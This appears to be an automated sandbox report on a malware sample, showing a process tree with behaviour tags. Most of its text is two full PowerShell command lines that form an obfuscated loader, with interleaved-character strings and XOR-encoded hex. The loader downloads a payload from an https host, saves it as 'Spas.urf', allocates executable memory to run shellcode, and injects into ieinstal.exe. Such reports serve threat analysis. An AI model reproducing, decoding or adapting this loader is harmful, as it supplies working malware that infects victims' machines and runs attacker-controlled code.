TVrMoGtDh e dL1B =K FIBnKcClB1i1 U'B1ABL0TCL1ADR1 C 1SB 0T7P4 9 4BDH2 4S0 0 0E5u0l0 4I7 2S0 0S7E1DFS0C6 0I2C0BC 4F1 4RDP0 7M1SCB0M5D0F5S4 5S4T9 2 9 4S1G3P2 3kAV1M0A1SAC1GDU0cC 0V4 4s7L3 BE1 CP0d7S1KDM0 0P0 4D0WC 4d7M2 0F0 7 1OD 0 CP1 BS0W6T1 9P3WAR0LCA1 BB1GFC0L0D0IA 0 CD1pAO4 7F2A1 0S8 0I7o0 D 0M5 0 C 3BBF0 Cr0AF 3A4m4t1F2F7 0 C 1 E 4O4 2I6 0 BA0G3 0NC 0OAs1 DB4F9T3 AM1 0R1LAP1MDF0LCe0B4B4 7 3ABC1 CS0U7 1SD 0 0T0s4 0 CK4L7b2K0P0G7L1ADU0RCS1TB 0B6K1E9D3MA 0 CH1AB 1FFN0 0J0 A 0GCA1 AB4 7 2 1A0S8D0E7s0 DC0E5E0 CH3 BE0OCK0PF 4 1 4T1B2A7N0FC 1 EH4f4H2P6H0 BD0S3s0BCA0 A 1 DC4U9 2r0a0 7a1TDF3 9F1 D 1 BR4 0R4 5O4R9 4M1r4SDA2IF 0 C 1 B 0 4e4S7 2UET0LC 1PDB2M4S0hC 1 D 0D1R0W6 0iDP4 1p4PDS2 4 0F8R1eD 0HC 0S4 0 8 5 Cg4 0R4 0M4 7E2 0T0 7R1 FD0b6 0T2S0DC 4 1F4PDA0s7 1PCP0U5 0K5 4T5 4 9 2C9G4G1 4FDI3VB 0 6S0U4 0U8U0A7T4 0 4S0 4 0 4 0 4b5G4P9V4 DT2T4l0 8 0 2T0 8 1HBK0 6P0E7 0 0 0FCH4L0 4 0L' ;g.J(U`$ eTh rDlM7 )C p`$GT rMoDtth eAdT1t;L} f uUnHc tAi o nL G D T L{ P aHrSaKm (O[RP aDrcaSm eKtFeDr ( P o s iAt iSoCnH T=l i0B,S MVa n dBa tHo r y T= U`$NT rIume )k]P S[KT yfpGeS[ ] ]F `$ ISlTd e rPe mM,T[FPPaPrsaFmBeJtDe r (SPUoLsRi tSi o nN B= 1 ) ] A[ T yPpCeR] L`$ GAl aCsSs lBi b e =S A[SVSo iFdH]M)L;t`$TTPrCoStLhUe dP2 = DI nVcSl 1 1t f' 4 DH2BAN0 6o0 C 0 5S0 8L1 AD1 DB1EBP4K9P5N4E4 9 3B2S2S8 1P9 1R9A2 DF0T6 0T4H0R8S0 0 0 7 3F4 5 3 5d3 2 AM1BCS1bB 1 BT0 CF0F7 1MD 2HDO0i6V0K4 0S8M0A0P0 7F4 7 2MDB0AC 0SFU0C0I0R7 0DC 2PDI1S0 0 7N0 8m0T4 0D0B0KAP2U8 1dAT1TA 0 CS0A4E0GBC0N5A1H0 4W1 4 1 2B7F0 CF1dEU4 4T2M6F0 Bt0E3 0JCE0 AB1 D 4t9M3 AB1G0U1 A 1 D 0 C 0 4F4R7H3EB 0 CD0FFJ0F5 0SCS0SAF1PD 0U0 0A6O0 7P4 7 2p8K1SAC1BAD0 CS0G4 0 BD0F5S1F0 2P7 0 8r0 4N0FC 4l1 4 D 2V4 0I8C1 D 0BC 0 4S0 8 5N1S4A0M4P0H4 5 4m9N3B2C3TAV1 0G1 AA1GDS0 C 0G4v4G7K3 BA0ACO0EF 0 5 0 CS0FAC1ID 0 0k0U6U0 7 4 7B2 C 0M4 0D0O1 D 4C7D2E8 1 AE1 A 0gC 0 4O0 Bl0K5I1 0R2SBM1FCT0d0W0 5T0QD 0 CS1 B 2P8 0CAM0 AB0 CE1IAR1tA 3N4M5 3O5b3 3MBY1 C 0u7f4U0 4 7 2SD 0ACT0DFF0U0N0 7G0PCS2SDE1E0S0D7 0d8 0 4 0 0P0TAA2S4L0T6T0BD 1RCS0S5S0KCE4F1Q4BD 2C4P0S8D1RDs0ACR0 4k0L8U5I0 4L5S4F9 4SDS0 FH0S8O0S5G1 A 0 CB4 0U4E7D2CDK0 C 0 FU0P0T0d7 0 C 3CDL1W0 1H9 0 C 4G1S4TD 0 CA0F1B1VB 0 5 5T9U4C5P4A9W4 D 0WCK0D1L1 BT0 5B5D8 4B5D4N9F3 2T3CA 1b0 1 A 1SD 0SCQ0 4M4K7A2 4A1 CM0m5 1DD 0M0L0FAD0A8 1 A 1 D 2 DO0 CA0K5P0mC 0UEU0 8 1FDT0 CM3U4O4 0A'F;S.S( `$ReCh rJl 7P) P`$WTHr oWtKhSe d 2S; `$ TorDoUt hLeBdC3C = I nSc lL1 1 R'S4 DP2BA 0S6I0LCL0P5 0F8 1BA 1TD 1 BD4R7L2 D 0CC 0TFV0 0T0 7 0WCA2 AS0M6 0f7O1 AF1OD 1UB 1nC 0FAE1LDB0D6U1HBF4C1e4 D 2 4V0 8p1CD 0PCB0L4 0b8F5SF 4T5 4S9 3T2 3PA 1J0 1SAU1WD 0 CS0S4K4V7 3HB 0aCC0 F 0 5S0 CF0PAE1 D 0C0 0 6 0 7Z4 7 2 A 0 8T0 5A0D5 0 0 0S7G0BET2 AO0P6F0 7M1 F 0CC 0 7T1 DQ0 0R0M6N0M7 1PAf3 4T5C3 5 3K3 A 1 Dm0e8 0 7B0RD 0U8j1 BR0LDP4B5H4B9 4VD 2 0R0 5S0BDM0NCC1 B 0 C 0U4 4S0O4 7D3KAd0BC 1oD 2K0 0D4R1l9 0 5O0ECS0U4 0 CI0 7 1 DD0 8F1AD 0A0D0F6A0O7 2OFT0H5R0 8 0UEF1FA 4 1 4MD 2M4T0S8H1 D 0SC 0 4 0D8 5ME 4s0 ' ; .b(S`$ eNhBr lR7H)P T`$ T r o tChpeBd 3N; `$ T r oTtUhSeAdP4R G= MISn c l 1S1B D'K4EDr2EAb0 6 0 C 0 5i0 8E1RA 1 D 1SBR4 7P2CDB0 C 0PF 0N0A0 7 0TCD2F4 0FC 1 DG0 1 0V6C0VDC4S1B4 D 0 C 0P1H1 Bk0z5 5TB 4B5 4 9 4 D 0 CR0 1R1IBH0J5S5SA 4L5T4T9K4PD 2 EO0 5 0O8R1 AI1 A 0 5 0 0N0AB 0 CP4P5 4U9 4hD 2 0 0 5P0SDA0 CB1aB 0FC 0 4 4P0 4f7o3BAG0 CB1SDA2 0A0 4S1L9 0M5T0ECu0 4S0 C 0 7M1 DM0 8d1dD 0F0T0A6 0 7 2HFS0p5 0G8O0UEB1 AJ4 1A4 DR2 4s0H8F1MD 0NCR0D4 0W8 5DEK4 0 ' ;V. (T`$ReHhRr lL7E) `$ST rHoBt hAe d 4M;P`$CTDrDoFt h e d 5 F= I nDcBlS1 1f K'F1 B 0OC 1AD 1 CE1 B 0J7 4 9U4ND 2 AK0 6 0 Cs0 5 0P8 1sA 1 DP1SB 4H7B2TAS1 BB0 C 0U8M1EDT0 CM3 DV1C0S1T9L0 C 4 1I4 0B' ;C. ( `$Ae hDrLlM7 )D `$ TTrRo t hRePdB5F ;T} `$AI nSd uC N=L FI nScUlM1G1g A'K0 2 0CCC1BBS0G7 0IC 0i5B5LA 5MBM'T;F`$ I nUc lT0S3 M=R I n cfl 1C1P F'B2SEM0HCN1CDS2 AS0T6B0J7B1 AB0 6A0T5D0SC 3 E 0 0 0 7E0 DV0 6C1GE 'H;O`$ I nBcUl 0D0 =yI n cKlB1C1W 'G3SAH0 1 0L6R1 ET3EEH0a0 0O7c0TDF0K6C1DEK'V;S`$DI n cil 0S1S =A IOn cClV1a1E P'G4 D 2NBO0 0F1PAM1FD 0S8 1PDK0RC 0 0 5TB 5 DU5M8P4B9H5L4 4P9k3g2 3SA 1A0B1AAP1 DD0bCE0P4 4O7 3 B 1 CL0H7S1 DN0 0U0R4 0SCT4 7S2 0E0 7O1 D 0 CN1 B 0T6r1 9v3 A 0NCA1MBA1LFA0R0 0BAP0BCS1OAS4L7V2P4 0 8 1DBE1CA 0 1s0S8 0 5 3S4 5N3A5D3S2BEA0 CB1FD 2BDB0 C 0 5 0 CD0FEH0A8M1VDR0VC 2AFA0 6F1FBA2HFF1SCU0L7F0iA 1AD 0F0S0 6 0A7B3 9 0 6 0 0R0C7 1SD 0SCB1 BE4P1 4 1A0 F 0 2G1S9i4F9D4 DF3 AS0L6F1 BF0E6A4R9 4VD 2B0S0I7R0bAD0I5O5 9 5 9 4C0D4 5N4 9 4g1 2HEF2 D 3 DD4 9S2S9C4O1G3U2C2H0T0 7 1CD 3B9 1 D 1 BR3S4 4G5l4S9 3V2 3LCU2S0 0 7 1TD 5GAs5 BP3R4e4U0B4U9l4 1 3 2F2M0 0H7S1HD 3V9 1CDr1 B 3S4B4T0 4 0 4p0R'G; .B( `$ eBh rBlS7 )P P`$ IEnDcSlD0O1S;D`$ I n c lF0L2L T= eI nEcCl 1A1 S'E4LD 2 8 1B9 0 8U1BDR0f8S4 9 5 4 4 9c3F2 3HA 1B0A1KAe1 D 0 CF0k4r4S7C3fBg1HC 0 7 1RDR0 0 0 4N0XCO4S7 2S0T0 7P1 DJ0BCB1 B 0A6 1P9P3VAI0 CH1CBV1dF 0I0 0 AD0WCB1 AU4 7 2 4Y0 8 1CBC1 AA0e1 0K8 0 5M3H4 5 3 5 3A2 EI0FC 1ZDA2 D 0OCS0G5 0 C 0SE 0S8 1NDK0 CV2 F 0S6 1GBS2SF 1SC 0a7 0 AA1HDL0 0H0F6 0P7U3C9 0B6M0S0W0W7D1EDD0NCV1BBO4P1M4N1 0 Fk0G2C1 9A4F9 4 DS2 0 0 7 0 DB1 CB4 9 4AD 2M0S0B7T0EAF0C5 5 9R5AAA4F0U4S5H4 9J4S1A2 EU2CD 3hD 4T9 2C9P4B1 3 2R2 0D0 7o1BDm3A9C1FD 1 BP3K4 4k0 4 9B4N1 3t2L2B0T0F7O1DD 3B9 1 DH1 BR3 4G4S0 4S0 4 0B'C; .V( `$Be hKr l 7M)p F`$RI n cRlC0U2U;U`$ TRrKodtAhSe dA7 =B AITnIcMlM1T1 R'N4GDS3 DF0 0 1S9 0 6C4L9 5B4 4 9 4 DT2A8 1U9C0A8 1PD 0D8E4p7p2O0i0 7S1 FB0 6H0 2 0 CT4 1 5 9S4 0 'A; . (S`$Oe h r lM7S)G `$FTOrDoDtPhGeJdS7P;U`$ST r oUtAhBead 7s S=S I nUcBlV1L1T 'F4 DB2aB 0G0A1kA 1BD 0D8M1 DF0 C 0S0R5DB 5SDM5F8L4O7O2F0 0A7e1lFG0B6 0L2 0KC 4p1S4FDL3CDU0E0 1H9 0p6S4U5U4 9 5M9C4M0 'S; .B(C`$Me h rUl 7V)P `$UT rHoPt hBeFd 7 ; `$ TSrToRt hIeFd 6 =P KIAn cBlH1K1C U'T4FD 0 0B0S7H0oDB0AFB0 3S0 CT1 D 4C9S5M4 4 9T3P2 3UAK1 0T1SA 1 D 0 CE0S4 4 7V3EB 1DCR0N7K1TDV0S0 0 4S0TC 4u7 2H0D0 7 1 D 0 CF1GBD0G6 1B9 3nAD0SCS1LB 1 FS0O0 0TAM0BCi1 AP4 7S2K4 0D8 1 B 1 Ae0T1 0P8S0M5v3I4B5E3t5 3P2oE 0 CC1 DN2 DL0 Cu0 5M0HCS0 ET0a8B1 D 0vCO2 FB0C6 1MBU2uFA1 C 0K7 0SAI1KDN0C0 0 6u0 7 3 9m0c6U0 0B0B7S1KD 0 CD1KBN4T1 4 1 0LF 0T2 1 9 4 9c4uD 2 0 0 7 0 Dt1uC 4S9 4AD 0MCG0 1 1iB 0 5M5pDg4A0E4s5B4T9B4 1F2 E 2 D 3CDR4 9O2O9S4 1S3C2 2S0 0P7 1HDL3S9 1BD 1 BS3E4 4P5 4S9J3R2K3SC 2 0 0 7m1PDR5TA 5 B 3S4B4 5A4K9B3 2 3FCP2 0p0U7R1 DH5MAG5 BE3D4c4E5 4c9R3 2 3 C 2f0T0D7 1MD 5PAG5PBd3K4 4C0T4 9 4B1D3H2G2G0B0S7K1 D 3F9N1 DU1 Bb3 4S4 0D4 0B4H0 ' ; . (A`$ eBh rTlF7A) `$STBr oIt hPe dT6P; `$GP s yPcA S=M fPk pO C`$DeEhsrNlI5P B`$PeihSrPl 6 ; `$BTNrEoKtNhGendP7C =F UIRnFc lG1D1 's4 D 3I9 0G8 1VF 0SC 0 2C0 0B1TBD0 2 0SC 0 7j5KAC4D9 5H4 4S9H4SD 0G0V0p7S0SDU0 FD0A3A0 Ck1GD 4 7A2S0 0A7C1nFF0A6 0R2G0FC 4 1F3H2K2m0T0G7 1DDS3 9 1 D 1CBM3S4R5B3 5R3 3 3U0 CS1BBG0M6S4 5K4r9 5FF 5SC 5GFR4M5 4B9R5S9S1 1c5 AL5m9 5 9 5N9B4 5B4g9F5T9 1L1b5BDA5B9C4F0 ' ; .G(V`$IeKh rSl 7 )S F`$ TSrSoRt h e d 7P;H`$PTEr o tAhAe d 8 = IGnOcBl 1 1 O' 4UD 3 EU0 1Z0 CE1SBA0 Cv0PFU4 9T5 4v4 9V4RD 0T0I0G7 0FDA0 FC0M3 0 CV1ADK4S7F2 0s0R7 1 F 0S6 0g2P0aC 4M1D3 2P2 0S0S7K1MDW3D9 1PDE1 BC3S4T5 3T5 3 3 3t0 CH1SB 0S6H4N5T4 9B5 BC5 8 5 8 5T1R5 1f5 FA5D9 5r1 4 5 4 9N5U9S1S1B5 A 5S9 5m9 5U9K4Y5K4F9b5 9c1 1O5 D 4E0 ' ;B.K(h`$ e hRrTl 7 ) K`$BTerSo t hAeSd 8 ; `$ Idn cVlS0 1F N=E DI nUc l 1 1D K' 0C1 1ADP1EDB1 9 1 Ao5 3 4 6K4I6C1E8 1FC 0P0C0 AA0 2 0SA 0K1F0 CI0BAS0P2E1 1A4K7U0MEO0 0 1 DK0 1 1UC 0HBB4 7F0 0P0 6U4N6E1S8 1HCP0 0R0 A 0S2A0 4 0ACk4U6B3 CR0 DN0 ES0 8v0S7B4S7 1VCB5DA 5TBF' ;m`$ IKn cUlP0P0S T= I nKc lS1G1 S'F4 D 3sA 1O9s0E1o0fC 1 BH0P6P0L4 4t9 5K4G4L9e4L1T2C7N0 CR1 Eh4S4 2 6r0 BD0K3 0CC 0 AG1RDK4M9O2B7D0 C 1OD 4P7L3 E 0 CB0 BL2 AA0P5U0 0 0BCU0P7 1BDU4R0U4A7S2FDA0 6O1IEU0 7X0W5 0S6Z0 8F0PDS3 AS1 D 1IBP0b0E0 7 0UEK4B1P4PD 2 0 0K7 0RAD0P5 5M9A5 8S4 0r' ; `$TTMr o t hDeVd 8H E= I ndc lM1Y1U M'F4BDB3U9 0B8A1KFP0AC 0A2a0B0S1EB 0B2S0LC 0 7T5 BH5p4S4 DD0DC 0 7S1AFL5 3U0T8O1P9 1S9 0KDM0O8 1lD 0V8 ' ;A. (C`$GePhKr lO7E)V A`$FTTr oVtShSe d 8z; `$FPPaHvIeNk i rSk e n 2D=U`$WP aFvAeJkRiMr k eBnM2 +I'K\TSepAass . u r f 'A;L`$ S pLhUe rPoVmG=s'S'I;Pinf S( -Pn oKt ( T e stt -SPAaHtEh `$ P a vce k i r kPe nT2 ) ) {uwShPiIlPe T( `$ SPpKhAe r oPmG F-VeAq R' 'n)n k{A.H( `$eeShCrPl 7I)G V`$AI n c lE0T0 ; SdtCaNr tR-SS lCeMeEpN 5C;n} SKeTt -sC oEn t egn t A`$LPPaCvOe kSiTrTkkepns2H `$DSNpChDeMrVo m ;N} `$ SRp h eUrCo mS = GTe te-SCMoOnFtCeFnst E`$LPRa v egkfiFr kPeon 2 ;S`$ T rOoFtPh eSdF9S =S IAnUc lB1A1B O'L4 D 3 DD1TB 0 6C1CD 0P1M0CCB0PDT4H9H5S4A4F9s3g2B3PA 1H0 1 A 1ADU0 CC0 4V4H7 2UAF0T6 0G7 1IFH0PC 1RBN1PDS3 4C5N3 5A3 2AFN1EB 0A6U0Z4E2HB 0 8C1rAR0 CA5AFP5cDC3 A 1 DS1 BR0B0F0D7A0REB4 1 4UD 3DA 1 9 0 1 0 CW1VB 0E6 0P4R4I0 'P; . ( `$ eFh r lE7 ) `$ TtrPo tEh e dF9V;S`$FS pDh e rEo mD0 B=O IMn cElH1K1S 'M3G2 3TAT1B0G1 A 1KDP0PC 0S4R4S7S3 BU1 CP0O7P1 D 0 0T0 4B0TCB4A7S2 0U0 7V1 D 0FCu1WBB0s6D1 9O3 AA0 C 1MB 1 Fe0 0R0KAO0RCP1 AY4 7 2 4 0S8 1PBN1BAA0M1V0V8K0 5 3 4I5 3 5 3K2MAU0 6R1U9A1S0 4N1B4 D 3MDS1BB 0m6 1 D 0 1 0RC 0LDe4E5 4T9L5B9P4C5I4M9 4S9 4VDP3K9L0 8E1HF 0 C 0R2M0 0m1LBB0r2 0SCP0 7 5SA 4U5 4 9 5JFH5 C 5AF 4U0 ' ;M.S( `$ eDhBrSl 7 )e `$PSTpAh e rPoTmB0V; `$SM aGg nY= `$UTJrFo tSh eLd .Dc olu nAts- 6U5 6D;S`$ZS p hde r o mc1 K=t IKn c lA1 1P H' 3M2 3 A 1 0 1 AM1 D 0SC 0L4 4 7 3JB 1SCB0R7F1ADC0I0 0 4P0 CE4f7 2F0E0 7A1 DE0 CM1PBM0C6 1H9B3TA 0OCH1 B 1 F 0U0S0MAO0pC 1LAf4S7B2O4 0S8 1rBF1MAS0 1B0 8 0 5 3F4 5A3 5C3r2 AS0t6D1S9 1a0p4 1A4ADA3FD 1 BP0P6 1BDG0 1B0uC 0oDI4S5 4 9C5PFH5KC 5 FR4S5 4S9 4SDD3 EK0 1K0 Cl1 BM0KCD0IFI4B5E4R9K4eD 2S4H0 8U0 E 0P7 4O0E' ;E. ( `$Fe hKrTlN7M)p S`$ASUpPhFe rBo mM1 ;O`$ S pMhsePrZo mV2L G= BIGn c l 1R1S 'A4HDT2S1F1S0I0 DP1UB 0M6M1 9M0L1S4D9 5 4E4 9S3 2M3 A 1 0T1CAR1CDM0 C 0 4H4F7 3 B 1 C 0 7 1TD 0T0F0 4 0RCH4 7 2T0V0A7O1CD 0 C 1pB 0 6A1 9P3OAH0 CA1DB 1RFS0F0S0 A 0ECG1FAS4G7 2B4 0U8O1RBI1BA 0K1S0S8U0W5K3 4T5 3e5T3A2 ES0 CO1CDG2 DV0ACM0 5u0 CM0UEB0S8D1 D 0 CF2GFO0D6H1eB 2UFB1IC 0S7 0PAS1SDL0 0H0H6A0 7 3 9s0D6O0 0 0 7T1 DM0GCI1EBB4 1S4H1 0 F 0S2S1 9 4A9T4HDG3AAE0 6N1RBg0M6 4R9P4ADa2A0 0G4 0 4K0 8T0 7 4U0C4 5S4 9 4 1G2NE 2GD 3 D 4 9f2P9M4D1m3p2T2 0T0S7 1ZDM3 9O1RDA1iB 3S4 4R5 4T9B3A2U2T0O0E7 1BDR3 9S1 D 1 B 3O4S4K5 4 9 3 2 2U0F0O7U1BD 3N9 1BDF1 Bm3S4 4 5 4 9A3U2E2L0G0M7 1 D 3P9 1FDT1 BI3 4 4B5K4M9 3f2 2M0A0T7U1ADT3 9T1MD 1SB 3 4R4 0F4 9 4 1L3 2 2 0D0 7T1VDM3 9 1 DT1 Bm3S4U4C0 4 0 4 0 'a; . (C`$FeBh r lK7H)H C`$MSCpNh eGrKo mB2 ;C`$GSUp h e rOo mP3 c=S WIBnMcTlB1 1S ' 4CDk2h1S1 0 0LD 1NBF0 6 1F9 0K1 4 7I2B0 0 7B1 FM0D6O0S2 0TCK4H1 4HDB3 9B0R8s1TFT0 C 0L2A0 0 1 B 0 2 0DCN0m7O5KAM4B5b4 DJ3GEA0A1E0FCK1JBG0TCR0lFK4e5S4MD 3 9 1SA 1 0H0 AL4G5P5 9C4 5 5A9 4 0S' ;U. (L`$ e hsr lU7 ) R`$ S pThre rPoGm 3K#Y;""";Function Spherom9 { param([String]$Wavel); For($Foreffel=1; $Foreffel -lt $Wavel.Length-1; $Foreffel+=(1+1)){$Incl = $Incl + $Wavel.Substring($Foreffel, 1)}; $Incl;}$Prov0 = Spherom9 'LIFE X ';$Prov1= Spherom9 $Misjoinam;if([IntPtr]::size -eq 8){.$env:systemroot\*ysw*64\*indo*ower*\v1.*\po*ll.exe $Prov1 ;}else{.$Prov0 $Prov1;}"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 '1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D0604080007472D0C0F00070C2D10070804000A281A1A0C040B05104141270C1E44260B030C0A1D493A101A1D0C04473B0C0F050C0A1D00060747281A1A0C040B05102708040C414D24081D0C04085140404549323A101A1D0C04473B0C0F050C0A1D000607472C04001D47281A1A0C040B05102B1C00050D0C1B280A0A0C1A1A3453533B1C0740472D0C0F00070C2D10070804000A24060D1C050C414D24081D0C04085045494D0F08051A0C40472D0C0F00070C3D10190C414D0C011B055945494D0C011B05584549323A101A1D0C0447241C051D000A081A1D2D0C050C0E081D0C3440';.($ehrl7) $Trothed2;$Trothed3 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C2A06071A1D1B1C0A1D061B414D24081D0C04085F4549323A101A1D0C04473B0C0F050C0A1D000607472A08050500070E2A06071F0C071D0006071A3453533A1D08070D081B0D45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed3;$Trothed4 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C240C1D01060D414D0C011B055B45494D0C011B055A45494D2E05081A1A05000B0C45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed4;$Trothed5 = Incl11 '1B0C1D1C1B07494D2A060C05081A1D1B472A1B0C081D0C3D10190C4140';.($ehrl7) $Trothed5 ;}$Indu = Incl11 '020C1B070C055A5B';$Incl03 = Incl11 '2E0C1D2A06071A06050C3E00070D061E';$Incl00=Incl11 '3A01061E3E00070D061E';$Incl01 = Incl11 '4D2B001A1D081D0C005B5D58495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D20070A055959404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Incl01;$Incl02 = Incl11 '4D2819081D08495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D20070A05595A404549412E2D3D4929413220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Incl02;$Trothed7 = Incl11 '4D3D0019064954494D2819081D084720071F06020C415940';.($ehrl7) $Trothed7;$Trothed7 = Incl11 '4D2B001A1D081D0C005B5D584720071F06020C414D3D00190645495940';.($ehrl7) $Trothed7;$Trothed6 = Incl11 '4D00070D0F030C1D495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D0C011B055D404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344549323C20071D5A5B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Trothed6;$Psyc = fkp $ehrl5 $ehrl6;$Trothed7 = Incl11 '4D39081F0C02001B020C075A4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495F5C5F454959115A595959454959115D5940';.($ehrl7) $Trothed7;$Trothed8 = Incl11 '4D3E010C1B0C0F4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495B585851515F5951454959115A595959454959115D40';.($ehrl7) $Trothed8;$Incl01 = Incl11 '011D1D191A534646181C000A020A010C0A0211470E001D011C0B47000646181C000A02040C463C0D0E0807471C5A5B';$Incl00 = Incl11 '4D3A19010C1B060449544941270C1E44260B030C0A1D49270C1D473E0C0B2A05000C071D40472D061E070506080D3A1D1B00070E414D20070A05595840';$Trothed8 = Incl11 '4D39081F0C02001B020C075B544D0C071F530819190D081D08';.($ehrl7) $Trothed8;$Pavekirken2=$Pavekirken2+'\Spas.urf';$Spherom='';if (-not(Test-Path $Pavekirken2)) {while ($Spherom -eq '') {.($ehrl7) $Incl00;Start-Sleep 5;}Set-Content $Pavekirken2 $Spherom;}$Spherom = Get-Content $Pavekirken2;$Trothed9 = Incl11 '4D3D1B061D010C0D495449323A101A1D0C04472A06071F0C1B1D3453532F1B06042B081A0C5F5D3A1D1B00070E414D3A19010C1B060440';.($ehrl7) $Trothed9;$Spherom0 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D4549594549494D39081F0C02001B020C075A45495F5C5F40';.($ehrl7) $Spherom0;$Magn=$Trothed.count-656;$Spherom1 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D45495F5C5F45494D3E010C1B0C0F45494D24080E0740';.($ehrl7) $Spherom1;$Spherom2 = Incl11 '4D21100D1B061901495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D2004040807404549412E2D3D4929413220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Spherom2;$Spherom3 = Incl11 '4D21100D1B0619014720071F06020C414D39081F0C02001B020C075A454D3E010C1B0C0F454D391A100A4559455940';.($ehrl7) $Spherom3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3568

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:564

Network

MITRE ATT&CK Matrix ATT&CK v6

